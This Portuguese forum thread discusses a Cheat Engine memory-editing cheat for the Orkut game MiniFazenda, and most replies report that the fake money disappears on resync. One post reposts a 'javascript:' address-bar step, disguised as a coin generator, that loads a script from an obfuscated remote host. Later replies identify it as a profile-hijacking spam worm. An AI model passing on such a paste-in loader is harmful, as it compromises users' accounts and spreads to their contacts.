MaximusLegend¹²³ 1 Postado 24 de Dezembro 2009 Compartilhar Postado 24 de Dezembro 2009 -=-Tutorial-=- 1°Abra o MiniFazenda 2°Abra o Hack ( Cheat Engine 5.5 ) e clica no computador que esta piscando , depois voce click no Time De internet ( Explorer , FireFox e ETC ... ) 3°Olhe quanto dinheiro você tem ( Ex : 280 Golds ) , Vá la no CE e em Value coloque o seu dinheiro , depois click em NewScan 4°Compre algo pode ser qualquer valor ( Ex : 20 Gols ) , Plante . 5°Você vai la no CE e em Value mude de 280 Gols , para 260 Gols e Next Scan Porque mudar 280 para 260 ?? Pq 20 - 280 = 260 6°La no Canto Esquerdo do CE apareceu so um adres , clica 2 vezes nele . 7°Ai la em baixo tem Value 260 -> Click duas vezes neste valor e mude para 999999 , depois OK 8°depois FRISA e boa diversão . :: Download: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se :: Scan: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se -=-Video Aula-=- ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
RoyalStickman 0 Postado 25 de Dezembro 2009 Compartilhar Postado 25 de Dezembro 2009 Isso é client side. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
MaximusLegend¹²³ 1 Postado 25 de Dezembro 2009 Autor Compartilhar Postado 25 de Dezembro 2009 Isso é client side. Sim , Tipo Eu tenho 280 e você pode ter 1000 ( ex ) . Você tem que usar o mesmo metado , Gasta 20 fica com 980 . Espero ter ajudado . ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Braian_Brasil 2 Postado 25 de Dezembro 2009 Compartilhar Postado 25 de Dezembro 2009 Realmente é Client Side, mais não significa que não funciona, pra falar a verdade ele funciona sim , só que não da pra comprar ;x Closed ake plz! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
MaximusLegend¹²³ 1 Postado 25 de Dezembro 2009 Autor Compartilhar Postado 25 de Dezembro 2009 Realmente é Client Side, mais não significa que não funciona, pra falar a verdade ele funciona sim , só que não da pra comprar ;x Closed ake plz! Claro que da para comprar , você ja testou ?? Olhe o Vídeo esta mostrando como da para comprar . ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
allanurso 0 Postado 26 de Dezembro 2009 Compartilhar Postado 26 de Dezembro 2009 Mais o cheat engine cria ilusão... quando você atualiza a pagina ou entao reinicia o orkut tudo que você comprou já sumiu!... não teria um cheat ou bug msm? sem o cheat engine!! porque ele é programa ilusório.... eu testei aqui no IE e no Firefox e nos dois foi a mesma coisa! quando atualiza some tudo! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
MaximusLegend¹²³ 1 Postado 26 de Dezembro 2009 Autor Compartilhar Postado 26 de Dezembro 2009 Mais o cheat engine cria ilusão... quando você atualiza a pagina ou entao reinicia o orkut tudo que você comprou já sumiu!... não teria um cheat ou bug msm? sem o cheat engine!! porque ele é programa ilusório.... eu testei aqui no IE e no Firefox e nos dois foi a mesma coisa! quando atualiza some tudo! Claro que não , Muitas vezes sim e outras não , eu era HACK de DragonFlable , MechQuest , AQ World e ainda sou . O DragonFable usase o CE e não é iluzão e real , eu consegui deixar meu ataque 99999 e matava os monstro em um so ataque ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
allanurso 0 Postado 26 de Dezembro 2009 Compartilhar Postado 26 de Dezembro 2009 mais no caso desse game é ilusão... seja de dinheiro ou no speed hack.... eu tentei os dois no IE, no Firefox e acabei de tentar no Safary e msm assim nao deu.... tipo... da pra comprar... ai vc fica com 999999 de dinheiro faz a festa... compra coisa pra kct... ai se vc fechar o orkut ou atualizar ou até msm mudar de pagina tudo volta ao normal vc fica com o dim ki vc tava... isso quando nao da erro de sincronismo antes de vc fazer a festa.. kkkkk.... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Braian_Brasil 2 Postado 26 de Dezembro 2009 Compartilhar Postado 26 de Dezembro 2009 Claro que da para comprar , você ja testou ?? Olhe o Vídeo esta mostrando como da para comprar . Desculpe, realmente funciona mais da erro de sincronização logo em seguida, e quando volta pro jogo sumiu seu dinheiro e oq vc comprou! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
bemlok 0 Postado 26 de Dezembro 2009 Compartilhar Postado 26 de Dezembro 2009 É da um erro depois eu tentei sai antes mais num deu :( vo fica tentando ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mikeout 0 Postado 27 de Dezembro 2009 Compartilhar Postado 27 de Dezembro 2009 funciona, to rico.kkk de boa :D ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
didaum2 0 Postado 28 de Dezembro 2009 Compartilhar Postado 28 de Dezembro 2009 Erro de sincronização! =\\\\ segui o passo a passo e nao deu, da esse maldito erro! =\\ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
MatoMemo 0 Postado 30 de Dezembro 2009 Compartilhar Postado 30 de Dezembro 2009 Erro ¬¬...... eu acho que esses que falam que deu certo é ele memo com outro login.... ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
souljack 0 Postado 1 de Janeiro 2010 Compartilhar Postado 1 de Janeiro 2010 AE EU VI ISSO EN UMA COMUNIDADE E FALA TUDO + AINDA NAO ACONTECEU NADA PRA MIN Lenbrando nao foi eu que criei 1) Primeiro, Copie o codigo abaixo que esta escrito em VERMELHO Codigo javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//sn%22+%22.%22+%22im%22+%22/%22+%22ttr9o%22;void(0) 2) Cole o codigo na barra de NAVEGACAO ( onde escreve http://WWW.orkut...) e aperte ENTER 3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK 4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce. Link da comunidade: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se c alguem consiguir agradeça ^^ eu nao consigui ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
xXnakanoXx 0 Postado 1 de Janeiro 2010 Compartilhar Postado 1 de Janeiro 2010 AE EU VI ISSO EN UMA COMUNIDADE E FALA TUDO + AINDA NAO ACONTECEU NADA PRA MIN Lenbrando nao foi eu que criei 1) Primeiro, Copie o codigo abaixo que esta escrito em VERMELHO Codigo javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//sn%22+%22.%22+%22im%22+%22/%22+%22ttr9o%22;void(0) 2) Cole o codigo na barra de NAVEGACAO ( onde escreve http://WWW.orkut...) e aperte ENTER 3) Ira aparecer uma Janelinha pedindo pra voce escolher a Quantidade de moedas, escolha e de OK 4) Agora aguarde 5 minutinhos, quando terminar aparecera uma mensagem avisando voce. Link da comunidade: É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se c alguem consiguir agradeça ^^ eu nao consigui isso é virus ! AOIEUAIEUAIOEUAOIU ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Braian_Brasil 2 Postado 1 de Janeiro 2010 Compartilhar Postado 1 de Janeiro 2010 isso é virus ! AOIEUAIEUAIOEUAOIU Não é virus, é pra mudar seu perfil e mandar mensagens irritantes pra todos os seus amigos, dai fika espalhando com os noob q tenta achar hack por java script ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
felippe.sa 0 Postado 1 de Janeiro 2010 Compartilhar Postado 1 de Janeiro 2010 po mais da erro na pagina nem adianta nada ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
miudinho2009 0 Postado 2 de Janeiro 2010 Compartilhar Postado 2 de Janeiro 2010 aff ese hacker pega mais da eerro na minifazenda e carrega a paginde nova e n ta mais o dinhiro ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
alisson_gato 2 Postado 2 de Janeiro 2010 Compartilhar Postado 2 de Janeiro 2010 Afee:gastei 150000 nisso i na hora nada -,-! é como se fosse apenas a imagen ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
biel009 0 Postado 4 de Janeiro 2010 Compartilhar Postado 4 de Janeiro 2010 Bom , Cara sinseramente esse Cheat Engine 5.5 Não Funciona ! Eu ja usei em vários jogos, ele apenas cria uma ilusão , e se voce quiser usar Speed Hack pode usar a vontade, depois que voce relogar , apenas nao vai estar mais ali oque voce plantou . Isso só cria uma Ilusão. Eu quero ver voce fazer um video usando o Cheat Engine 5.5 , usar o Gold , Comprar e Relogar e continuar o dinheiro ou o item, quando voce conseguir fazer isso ai voce posta uma coisa certa ! , se conseguir ou alguem aqui me chama no Msn : [email protected] [ Sou level 22 e nunca usei hacker e nao é essa vez q vai funfar] ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
luisfilipe96 0 Postado 5 de Janeiro 2010 Compartilhar Postado 5 de Janeiro 2010 Vocês podem tentar honestamente... http://www.webcheats.com.br/forum/outros-games-tutoriais/271068-tutorial-mini-fazenda.html ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
kingofkagi 0 Postado 6 de Janeiro 2010 Compartilhar Postado 6 de Janeiro 2010 O.o, tbm nao consigo, so cria ilusao, quem conseguir realmente, me add pra me ajudar *-* [email protected] ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
nilmar340 0 Postado 6 de Janeiro 2010 Compartilhar Postado 6 de Janeiro 2010 n funfo =/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Infameous 0 Postado 11 de Janeiro 2010 Compartilhar Postado 11 de Janeiro 2010 nem tentem nada cheat engine ,omatic nenhum desses funcionam . sao so ilusao mesmo se nao der erro nao compra ou quando atualiza volta ao normal ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
vinicius.edson 0 Postado 11 de Janeiro 2010 Compartilhar Postado 11 de Janeiro 2010 O jogo é sincronizado em tempo real (cada ação atualiza com o servidor na hora) e não permite esse tipo de brexa idiota. Quem conseguir hackear a porta do MySQL deles ganha um doce. ---@ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados